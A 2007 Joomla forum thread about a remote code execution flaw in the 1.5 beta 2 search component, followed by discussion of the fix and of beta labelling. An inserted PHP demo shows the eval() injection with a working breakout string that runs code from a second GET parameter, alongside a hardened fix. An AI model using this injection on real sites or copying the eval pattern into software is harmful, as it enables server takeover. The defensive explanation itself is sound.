dangerous vulnerability in Joomla 1.5 beta 2

Please see sticky inside.
stiwa10
I've been banned!
Posts: 142
Joined: Fri May 25, 2007 10:57 pm
Location: morocco

dangerous vulnerability in Joomla 1.5 beta 2

Post by stiwa10 » Sun Jul 22, 2007 9:21 pm

Hello,
A dangerous vulnerability has been detected in Joomla 1.5 beta 2 (remote command execution).

Vulnerability overview:
-----------------------

The search component of Joomla! allows an attacker to execute arbitrary
PHP commands. It is e.g. possible to execute OS commands via system()
calls. PHP is set to the settings recommended by the Joomla! installer!


An attacker does not need to be authenticated to perform this attack!

Vulnerability description:
--------------------------

The following scripts of a default Joomla! 1.5 beta 2 installation
contain the vulnerable code:

1) components/com_search/views/search/tmpl/default_results.php

line 12: result .'";'); ?>

2) templates/beez/html/com_search/search/default_results.php

line 25: echo '' . eval ('echo "' . $this->result . '";');


Input of the "searchword" parameter is being passed to the mentioned
eval() code and executed. An attacker is able to append new PHP commands
after the "echo" language construct which can be used for OS command
execution.

In order to bypass the search word length limitation of 20 characters a
new GET parameter is being used to specify the OS commands (see proof of
concept).

You can read more here: http://www.milw0rm.com/exploits/4212
Last edited by infograf768 on Mon Jul 23, 2007 6:06 am, edited 1 time in total.
Glory be to Allah and praise Him; glory be to Allah the Great.
http://www.joomla35.us
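
The injection the advisory describes, as an added example that is not part of the original post, the milw0rm advisory, or Joomla's own code. It reproduces the eval('echo "...";') pattern quoted above with a constructed search word, then shows a renderer that never compiles user data as PHP. Assumptions made here: the 20-character limit is modelled as a plain truncation of the search word; the second GET parameter is named 0 (any name works, since the template only compiles the search word); and the payload sets a marker variable instead of calling system(), so nothing runs on the host beyond the demonstration.

```php
<?php
// Added example, not Joomla's code. Reproduces the eval() pattern from the
// advisory with a constructed request and shows a hardened renderer.

// Search-word length limit described in the advisory, modelled here as a
// plain truncation (assumption; the real enforcement may differ).
const SEARCHWORD_MAX = 20;

// Vulnerable pattern, same shape as the beez default_results.php line quoted
// in the advisory: the result text (which echoes the search term back to the
// user, so it is attacker-controlled) is spliced into a PHP string literal
// and handed to eval().
function render_vulnerable(string $result): string {
    ob_start();
    eval('echo "' . $result . '";');   // VULNERABLE: $result breaks out of the literal
    return (string) ob_get_clean();
}

// Hardened form: no eval() at all. The value is treated purely as output data
// and HTML-escaped; nothing user-supplied is ever compiled as PHP.
function render_safe(string $result): string {
    return htmlspecialchars($result, ENT_QUOTES, 'UTF-8');
}

// Constructed request (not the milw0rm PoC). The search word is 19 characters:
// '"' closes the string literal, ';' ends the echo statement, eval() pulls the
// real payload from a second parameter, and '//' comments out the trailing
// '";' that the template appends, so the generated code still parses.
// The advisory's PoC calls system() on that second parameter; this demo only
// sets a marker variable so the example is safe to run.
$_GET = [
    'searchword' => '";eval($_GET[0]);//',
    0            => '$GLOBALS["injected"] = true;',
];
$GLOBALS['injected'] = false;

$searchword = substr($_GET['searchword'], 0, SEARCHWORD_MAX);

echo "vulnerable output: [" . render_vulnerable($searchword) . "]\n";
echo "injected code ran: " . var_export($GLOBALS['injected'], true) . "\n";

$GLOBALS['injected'] = false;
echo "hardened output:   [" . render_safe($searchword) . "]\n";
echo "injected code ran: " . var_export($GLOBALS['injected'], true) . "\n";
```

Run it with the php command-line binary: the vulnerable renderer reports that the injected statement executed, the hardened one emits the search word as escaped text. The fix that matters is removing eval(), not escaping before eval(): addslashes() or similar would still leave `$` interpolation inside the double-quoted literal (for example `${...}` syntax, which evaluates an expression to obtain a variable name), and there is no reason to compile output text at all.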

Hackwar
Joomla! Virtuoso
Posts: 3788
Joined: Fri Sep 16, 2005 8:41 pm
Location: NRW - Germany

Re: dangerous vulnerability in Joomla 1.5 beta 2

Post by Hackwar » Sun Jul 22, 2007 9:59 pm

Joomla! 1.5 Beta 2 was not meant for production use, since exactly those security checks were not made. Two weeks ago, this vulnerability was fixed in the trunk.
god doesn't play dice with the universe. not after that drunken night with the devil where he lost classical mechanics in a game of craps.

Since the creation of the Internet, the Earth's rotation has been fueled, primarily, by the collective spinning of English teachers in their graves.

user deleted

Re: dangerous vulnerability in Joomla 1.5 beta 2

Post by user deleted » Tue Jul 24, 2007 9:24 am

Moderator note: moving from Development 1.5 to New J1.5 Forum Section

AmyStephen
Joomla! Champion
Posts: 7018
Joined: Wed Nov 22, 2006 3:35 pm
Location: Nebraska

Re: dangerous vulnerability in Joomla 1.5 beta 2

Post by AmyStephen » Tue Jul 24, 2007 2:51 pm

In case someone hasn't heard the good news, we are now at Joomla! v 1.5 RC 1 where this problem does *not* exist.

hannul
Joomla! Explorer
Posts: 265
Joined: Sun Jun 11, 2006 10:51 am
Location: Finland

Re: dangerous vulnerability in Joomla 1.5 beta 2

Post by hannul » Tue Jul 24, 2007 4:01 pm

In today's world, beta so often means usable that if one wants to avoid people using one's products, one had better name it alpha.

willebil
Joomla! Guru
Posts: 762
Joined: Thu Aug 18, 2005 12:06 pm
Location: Netherlands

Re: dangerous vulnerability in Joomla 1.5 beta 2

Post by willebil » Tue Jul 24, 2007 8:18 pm

Hannul, we have been very explicit about not using the betas on production sites.

Alpha = API is subject to change, functionality is not fully ready
Beta = API is not subject to change (at least we will try), but code is not production ready
RC = code is considered production ready, last status before we go live
Stable = code is fully ready, release goes into maintenance mode (only maintenance releases will be done, and we move on to the next major/minor versions)

See also the development strategy for an in-depth explanation --> http://dev.joomla.org/Joomla!%20Develop ... .v.1.0.pdf

hannul
Joomla! Explorer
Posts: 265
Joined: Sun Jun 11, 2006 10:51 am
Location: Finland

Re: dangerous vulnerability in Joomla 1.5 beta 2

Post by hannul » Wed Jul 25, 2007 8:11 am

I did not mean that the fault is Joomla's, but the fact is that there are products named beta (like Google's many services) and code with version numbers less than 1.0 (many PEAR modules) that are fully usable. So it doesn't help anymore what J says; people don't read but act as they are used to. The assumption is that beta = usable.

I don't think that Joomla could have done it (versioning, warnings) any differently, but it is useless to assume that just saying that beta is not for production use is good enough.

There is another thing also: beta was launched to be tested, so it is safe to assume that while there are no "production sites" out there, test sites are, and that those have still been indexed by Google. Or is there something in the beta distribution that prevents this?

To me, by the way, it seemed that the security flaw was only usable if beez was the selected template, and rhuk_milkyway is the default, so probably most of the test installations avoid this security flaw.

Chris
Joomla! Guru
Posts: 812
Joined: Sat Aug 20, 2005 3:58 am
Location: Australia

Re: dangerous vulnerability in Joomla 1.5 beta 2

Post by Chris » Sat Jul 28, 2007 9:10 am

hannul wrote:
There is another thing also: beta was launched to be tested, so it is safe to assume that while there are no "production sites" out there, test sites are, and that those have still been indexed by Google. Or is there something in the beta distribution that prevents this?
If one wants to stop indexing and/or anyone other than the owner of the site using it, there are .htaccess, robots.txt and other tricks to stop that, I would think.
And I suppose that is what one should do with test sites anyway.
There is no failure until you give up.

Chris

nathandiehl
Joomla! Champion
Posts: 6044
Joined: Fri Aug 19, 2005 3:03 pm
Location: Indiana, USA

Re: dangerous vulnerability in Joomla 1.5 beta 2

Post by nathandiehl » Tue Jul 31, 2007 4:00 pm

I am going to move this to the Beta 2 board, as this vulnerability was in Beta 2, not in RC.
If you're new to Joomla, Please read Anna's Joomla! Tips: http://forum.joomla.org/viewtopic.php?t=5503

http://nathandiehl.com | Find out what makes me tick


